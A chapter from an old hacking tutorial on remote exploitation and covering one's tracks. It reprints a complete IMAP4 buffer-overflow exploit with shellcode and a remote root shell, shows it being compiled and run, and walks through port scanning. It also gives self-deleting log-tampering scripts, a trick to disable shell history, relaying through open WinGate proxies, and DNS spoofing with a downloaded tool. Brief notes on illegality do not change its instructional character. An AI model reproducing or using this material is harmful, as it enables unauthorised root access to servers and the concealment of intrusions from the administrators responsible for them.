===============================================================================
2 - Techniques & Remote Exploits.
===============================================================================
Remote exploits works in a way so you execute a program on your computer,
that program sends something to the other computer, exploiting a vunerebilety
and giving you access to the remote operating system.
The phf trick which I talked about in the beginning, uses a bug in the
remote system to gain information that you normally wouldent be allowed to get.
An exploit doesn't have to give you access to computer thought,
a DoS (Denial of Service) attack is also a form of exploit, the most simple
way of performing a DoS attack is to send oversized fragmented ICMP pings
that causes windows (95) to crash.
The most well known DoS attack programs that uses that are 'teardrop',
'nestea' and 'nestea2'.
What happens is, when the Windows computer gets the oversized fragmented ping
it doesn't know really what to do with it, so it takes alot of CPU time
to process it, and if you send several of those in a `flood` the system
totally locks up.
This is atleast what I have heard is happening, but don't take that as any
absolute fact, I have not read the source code for any of those DoS attacks,
so and I have not really read about flooding all that much...
Flooding as flooding is just to send so many pings that the remote modem
can't handle it and shuts down, or atleast gets lagged, anyway flooding
is lame and you will end up in the remote computers logs if they log...
And since DoS attacks and Flooding is illegal, that is not a good idea.
-------------------------------------------------------------------------------
Note: lag / lagging, is another word for long/bad ping times. The time it takes
from when you send a request to a remote computer until it responds and
it get back to your computer.
-------------------------------------------------------------------------------
Now let's take a look at a real remote exploit and about what it does,
this exploit works for imap versions:
IMAP4rev1 9.0
IMAP4rev1 v10.190
IMAP4rev1 v10.223
IMAP4rev1 v10.203
IMAP4 Service 8.3
So here we go:
===============================================================================
Here follows the exploit source code exactly as I got it from bugtraq.
===============================================================================
/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */
#include
#include
#include
#include
#include
#include
#include
#define RET_POS 1028
int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
void RunShell(int thesock);
struct types {
char *name;
unsigned long ret_addr;
};
struct types types[]={
{"IMAP4rev1 9.0",0xbffff6e4},
{"IMAP4rev1 v10.190",0xbffff30f},
{"IMAP4rev1 v10.223",0xbffff6e4},
{"IMAP4rev1 v10.203",0xbffff30f},
{"IMAP4 Service 8.3",0xbffff724},
{NULL,0}
};
char overflow_buff[4096];
struct in_addr victim;
/* standard shellcode with a few modifications */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
int main (int argc,char **argv)
{
unsigned long *ret;
char recvbuf[1024];
int sockfd;
int i,n=0;
if (argc < 2)
{
printf("Usage: %s [offset]\n",argv[0]);
exit(0);
}
if (!host_to_ip(argv[1],&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
memset(overflow_buff,0x90,4096);
for (i=RET_POS-(strlen(hellcode));i< 0)
{
fprintf(stderr,"Error connecting to remote host\n");
exit(0);
}
n=read(sockfd,recvbuf,1024);
if (n <= 0) {
fprintf(stderr,"Connection closed\n");
exit(0);
}
printf("%s\n",recvbuf);
for (i=0;;i++)
{
if (types[i].name==NULL)
{
i=0;
break;
}
if (strstr(recvbuf,types[i].name))
break;
}
printf("Imap type %d\n",i);
ret=(unsigned long *)(overflow_buff+RET_POS);
*ret=types[i].ret_addr;
if (argv[2]) *ret+=(unsigned long)atoi(argv[2]);
overflow_buff[RET_POS+4]=0;
printf("Sending overflow\n");
fdprintf(sockfd,"* AUTHENTICATE {%d}\n",strlen(overflow_buff));
fdprintf(sockfd,"%s\r\n",overflow_buff);
read(sockfd,recvbuf,1024);
printf("Got shell\n");
RunShell(sockfd);
close(sockfd);
return;
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}
int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;
va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}
int connect_tcp(struct in_addr addr,unsigned short port)
{
struct sockaddr_in serv;
int thesock,flags;
thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0)
return(-1);
else
return(thesock);
}
int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
===============================================================================
Note: since this is not a socks coding tutorial I wont really go into what
every line in this exploit does, but I will cover it in whole.
===============================================================================
To make this work:
Cut away what comes before "#include " and after the last "}",
name is something like "imapx.c" then compile it, like this:
gcc -o imapx imapx.c
then ./imapx ...... as this following example:
-------------------------------------------------------------------------------
[user@localhost user]$ gcc -o imapx imapx.c
[user@localhost user]$ ./imapx 127.0.0.1
* OK
localhost.localdomain IMAP4rev1 Service 9.0(157) at Thu, 6 Jan 2000 07:33:39 +0900 (JST) (Report problems in this server to MRC@CAC.Washington.EDU)
Imap type 0
Sending overflow
Got shell
whoami
root
exit
Connection closed by foreign host.
[user@localhost user]$
-------------------------------------------------------------------------------
[user@localhost user]$ gcc -o imapx imapx.c <<== Compiling the exploit.
[user@localhost user]$ ./imapx 127.0.0.1 <<== Executing it on myself.
*OK <<== Connected to host.
localhost.localdomain IMAP4rev1 Service 9.0(157) at Thu, 6 Jan 2000 07:33:39 +0900 (JST) [and more] <<== Server name, imap version, date, and so on.
Imap type 0 <<== This is the exploits internal type of the imap version.
Sending overflow <<== Does what it says, sending the actual exploit.
Got shell <<== means it's ready, you are in the remote computer.
whoami <<== User input (this is the first command I send)
root <<== Answer from the computer, I am in as root.
exit <<== I exit the shell, and out of the remote computer.
Connection closed by foreign host. <<== Is what is says it is.
[user@localhost user]$ <<== Back in my own computer.
-------------------------------------------------------------------------------
Now you have the basic idea of how to use an exploit, now we come to the
question, when do you use what sort of exploit ?
Well to know what remote exploit to use you need to know what servers (daemons)
the remote computer is running, first step to knowing that is to 'port scan'
the computer, for that you can use a port scanner such as `nmap`, you can
get nmap at: http://www.insecure.org/nmap/dist/nmap-2.12.tgz
or if you prefer rpm's: http://www.insecure.org/nmap/dist/nmap-2.12-1.i386.rpm
(nmap-2.12 is the latest stable version when I write this in January 2000,
though there is a nmap-2.3BETA9.)
If you get the *.tgz version you need to unpack it and compile is, and that
you do like this:
[user@localhost user]$ tar -zvxf nmap-2.12.tgz
.......
here it shows alot of uncompressed files.
.......
[user@localhost user]$ cd nmap
[user@localhost nmap]$ ./configure
.......
here it configures the the make scripts, wait until it's done.
.......
[user@localhost nmap]$ make
.......
here it compiles the program, might take a while.
.......
[user@localhost nmap]$ su -c "make install"
Password: <<==== here you type the root password.
If you don't have root access to the computer, you can take the 'binary'
move it to where ever you want and run from there, instead of doing
the `su -c "make install"` part.
Like this:
[user@localhost nmap]$ cp nmap ../
[user@localhost nmap]$ cd ..
[user@localhost user]$ ./nmap 127.0.0.1
Starting nmap V. 2.3BETA9 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on localhost (127.0.0.1):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
143 open tcp imap2
113 open tcp auth
515 open tcp printer
6000 open tcp X11
Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
[user@localhost user]$
Here you have a computer with 7 ports open, say now that you want to know what
version of Sendmail this person is running, you do like this:
(Sendmail is the 'smtp' on port 25)
[user@localhost user]$ telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 localhost.localdomain ESMTP Sendmail 8.9.3/8.9.3; Sun, 9 Jan 2000 03:03:22 +0100
quit
221 localhost.localdomain closing connection
Connection closed by foreign host.
[user@localhost user]$
Here we telnet to the host (in this case our own computer) and it answered
with a Sendmail 8.9.3, then we typed `quit` to get out and back to the
prompt.
Now if we can find a remote *root* exploit for Sendmail 8.9.3, we can
root it remotely, or if we find a local exploit for it, we root the
computer if we have user access to it.
If you got the *.rpm file instead of the *.tgz you install it like this:
[root@localhost user]# rpm -ivh nmap-2.12-1.i386.rpm
nmap: ###############################################################
[root@localhost user]#
Observe that you have to be root to install an rpm file.
Those ###'s works like a percent meter, when it's full the file is installed.
The use of it works the same, except if you did the `su -c "make install"`
or the rpm install you don't have to start it by "./nmap ", just
typing "nmap " at a command prompt will do.
-------------------------------------------------------------------------------
By now you know the basic ideas of how to break into a computer, but if
you were to just apply this in blind you will get busted within a VERY
short time.
Here is a good time to remember that it is illegal to break into someone's
computer, and how easy it is to get busted if you try.
Let me show just how easy it is to get busted by explaining how a hacker
hides.
To 'hide' so you wont get noticed, when you hack the old 127.0.0.1
(localhost, this is always your own internal IP, if you connect to
127.0.0.1 or localhost, you will end up in your own computer), you need
to know about the following:
Log cleaning, bouncing and spoofing.
Every time you connect to another computer even for just a second, it will
get logged, that goes for any sort of connection, as if you connect to
a web page, your IP will be logged, if you telnet to a computer it will
get logged, and so on.
-------------------------------------------------------------------------------
First thing is you need to learn is how to clean the logs.
The very first thing I can say about logs and log cleaning, is, logs are
usually stored in a directory called /var/log/
If someone tells you to do "rm -rf /var/log/" as in removing the whole
directory, just laugh and know that it's a lamer your talking to.
A system administrator that doesn't notice that the whole /var/log/ is missing
shouldent be a system administrator.
And if it is a good system administrator, he may be able to recover all
the logs and see your IP, and hence getting you busted.
For those of you that thinks that `undeleting` removed files in Linux or
UNIX is impossible, read: /usr/doc/HOWTO/mini/Ext2fs-Undeletion
So do NOT delete ANY files, one way to go about it, (saying that the IP we are
going to wipe out of the logs are 127.0.0.1), would be to do this:
[root@localhost root]# cd /var/log/
[root@localhost log]# ls -la
total 311
drwxr-xr-x 2 root root 1024 Jan 9 04:02 ./
drwxr-xr-x 17 root root 1024 Jan 8 01:03 ../
-rw------- 1 root root 167 Jan 9 04:22 cron
-rw------- 1 root root 63599 Jan 9 04:02 cron.1
-rw-r--r-- 1 root root 2406 Jan 3 18:42 dmesg
-rw-r--r-- 1 root root 0 Dec 28 22:50 htmlaccess.log
-rw-r----- 1 root root 0 Jan 6 00:04 imapd.log
-rw-r--r-- 1 root root 146584 Jan 6 04:01 lastlog
-rw------- 1 root root 313 Jan 9 04:23 maillog
-rw------- 1 root root 12585 Jan 9 03:03 maillog.1
-rw------- 1 root root 276 Jan 9 04:22 messages
-rw------- 1 root root 185004 Jan 9 04:02 messages.1
-rw-r--r-- 1 root root 0 Jan 1 04:02 netconf.log
-rw------- 1 root root 0 Jan 9 04:02 secure
-rw------- 1 root root 8530 Jan 9 02:59 secure.1
-rw-r--r-- 1 root root 616 Jan 9 04:23 sendmail.st
-rw------- 1 root root 0 Jan 9 04:02 spooler
-rw------- 1 root root 0 Jan 2 04:02 spooler.1
-rw-rw-r-- 1 root utmp 28032 Jan 6 04:01 wtmp
[root@localhost log]#
And from there by hand do something like this for each file:
[root@localhost log]# cat cron | grep -v 127.0.0.1 > file.tmp
[root@localhost log]# mv file.tmp cron
[root@localhost log]# cat cron.1 | grep -v 127.0.0.1 > file.tmp
[root@localhost log]# mv file.tmp cron.1
And so on for each and every file.
A note beeing that you can make a short script for it, like this:
[root@localhost root]# cd
[root@localhost root]# pico clean.sh
Here you get up a new blank file, where in you put the following:
#!/bin/bash
IP="$1"
cd /var/log/
ls -1 > list.tmp
for files in `cat list.tmp`; do
cat $file | grep -v $IP > tmp.$$
mv tmp.$$ $file
done
rm -f list.tmp
cd
echo "Done"
rm -f $0
Then you press Ctrl+X and save/exit the file, whereon you do this:
[root@localhost root]# chmod a+x clean.sh
That is to make the file executable, then to run it you do like this:
[root@localhost root]# ./clean.sh 127.0.0.1
Done
[root@localhost root]#
That will take away all lines in the logs, that contain the IP 127.0.0.1.
Also the cleaning script will delete it self when it's don't cleaning
the logs, just so you wont forget to remove it after your done.
The line that makes the script remove it self is the last line:
"rm -f $0", so if you don't want it to remove it self, remove that line.
But this is still not a good way to do it, if the system administrator
runs a `tripwire` it will instantly show that the logs have been
messed with, and what the changes are, the same thing goes for if someone
removes the entire directory as well.
Most `tripwires` are set to just check so the logs don't shrink, and
needless to say, if we remove the IP's from the log it will be smaller
then with the IP in it.
So what we want to do is to replace our IP with some bogus IP, this
we can also do with a simple script.
Do the same way as was shown with the last script, but replace the contents
of the script with this:
#!/bin/bash
IP="$1"
IP2="$2"
cd /var/log/
ls -1 > list.tmp
for files in `cat list.tmp`; do
sed 's/'$IP'/'$IP2'/g' $files > tmp.$$
mv tmp.$$ $files
done
rm -f list.tmp
cd
echo "Done"
rm -f $0
To execute this you do:
[root@localhost root]# ./clean.sh 127.0.0.1 145.1.1.4
Done
[root@localhost root]#
This will replace the IP (127.0.0.1) with another IP (145.1.1.4), and do make
sure that if your IP is built like 127.0.0.1 (xxx.x.x.x) you replace it
with an IP that's built the same way as x.x.x.x takes up less space in a
file then the IP xxx.xxx.xxx.xxx would, because x.x.x.x holds less
characters, and hence a normal (sloppy configured) tripwire would detect it.
After cleaning your IP out of the logs, do the same for your hostname,
if your IP resolves to a host, as 127.0.0.1 would resolve to "localhost"
A note is that you must already have rooted the box/be root before you can
clean up the logs.
So if you try to hack something and fail, your IP will stay in those logs.
After you cleaned those logs, your actions will still be recorded in a file
called ~/.bash_history, and on a normal system nothing is written to that
file until you logs out. so you might want to log out, then log back in
and clean that by hand with emacs or pico or your text editor of choice.
But then again, if you reconnect to the system, your IP will once again
be in all logs.
You *can* link .bash_history to /dev/null by doing:
[user@localhost user]$ rm -f ~/.bash_history
[user@localhost user]$ ln -s /dev/null ~/.bash_history
But then again, you shouldent remove any files, and a link such as that
will be noticed the next time the user/admin logs in.
This brings us to bouncing.
-------------------------------------------------------------------------------
Bouncing is when you use a middle computer between your computer and your
target computer, such as a wingate or an already hacked computer, prefferebley
both.
That way YOUR ip will not turn up in the logs.
It is however still of the utmost importance that you clean those logs, to
prevent any tracebacks to you.
A wingate is a proxy that usually let's you use it to forward a connection
to anywhere you want without a password, it's very simple and works like this:
[user@localhost user]$ telnet 212.151.231.70
Trying 212.151.231.70...
Connected to d212-151-231-70.swipnet.se.
Escape character is '^]'.
WinGate> <<== Here you just type the IP/host of the computer
you want to connect to.
like this example:
[user@localhost user]$ telnet 212.151.231.70
Trying 212.151.231.70...
Connected to d212-151-231-70.swipnet.se.
Escape character is '^]'.
WinGate> 212.151.91.4
Connecting to host d212-151-91-4.swipnet.se...Connected
login:
And there is where you type the login name and so on, if you have it.
This might come very handy if you know some logins/passwords so you can
bounce to one computer and do the actual hacking from that.
And again, when you connect to a WinGate, you are most likely to get
logged there as well .... you may bounce of 10 wingates before you connect
to a real system.
It is still possible however unlikely that someone will trace you.
Again a good time to remember that hacking is illegal and how easy it
is to get busted.
And this brings us to spoofing.
-------------------------------------------------------------------------------
To spoof for read as in DNS spoofing, you need to have root access to a
name server, (prefferebley an internic registered name server).
And from there you can cache a fake domain.
The easiest way to do so is to run a program such as jizz, you can get jizz
from nova5000.com
The easiest way to get it is to do as this expel:
[root@ns root]# lynx http://www2.dataguard.no/bugtraq/1997_3/0399.html -dump > jizz.sh
Then pico or emacs the jizz.sh and cut away what comes before #!/bin/sh, and
what comes after the last done (right before the --- end jizz.sh ---)
Then you fill in the configuration data in the beginning of the jizz.sh file.
Change these:
NS=ns3.datatrax.net
IP=1.2.3.4
AUTH=spoof.datatrax.net
To what you need them to be, then do this:
[root@ns root]# chmod u+x jizz.sh
After that we are ready to start, if you just execute jizz without any
arguments it will look like this:
[root@ns root]# ./jizz.sh
Intelligent DNS spoofer interface, by philbert.
(philbert@DataTrax.Net)
usage: ./jizz.sh
or: ./jizz.sh -ns
[root@ns root]#
So, here you want to first find out what IP you have, that you do (in Linux/UNIX)
with the command `ifconfig` like this:
[root@ns root]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:10:5A:6D:C7:0E
inet addr:212.151.91.4 Bcast:212.151.91.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:449484 errors:26 dropped:0 overruns:0 frame:36
TX packets:166849 errors:0 dropped:0 overruns:0 carrier:6
collisions:39 txqueuelen:100
Interrupt:11 Base address:0x6c00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:348633 errors:0 dropped:0 overruns:0 frame:0
TX packets:348633 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
[root@ns root]#
This means that your IP is "212.151.91.4".
And that if we resolve that:
[root@ns root]# nslookup 212.151.91.4
Server: d212-151-231-70.swipnet.se
Address: 127.0.0.1
Name: d212-151-231-70.swipnet.se
Address: 212.151.91.4
[root@pc140 /root]#
That makes your hostname "d212-151-231-70.swipnet.se".
So say now that you are going to hack 212.151.91.10 (also beeing a name server
in this example) and you want to spoof your IP, then you do like this:
[root@ns root]# ./jizz.sh 212.151.91.10 some-other-domain.com 212.151.91.10
trying to cache some-other-domain.com on the server itself...
Success!, some-other-domain.com is cached on 212.151.91.10 as 212.151.91.10
[root@ns root]#
After that you can start to connect to 212.151.91.10, and it's logs
will only show up as if that computer connected to it self.
Here is a good time to remember that it's illegal to spoof.
-------------------------------------------------------------------------------
This is about all that needs to be said about how to operate remote exploits
WinGates and how to spoof.
So now let's move on to other techniques.
Posted in 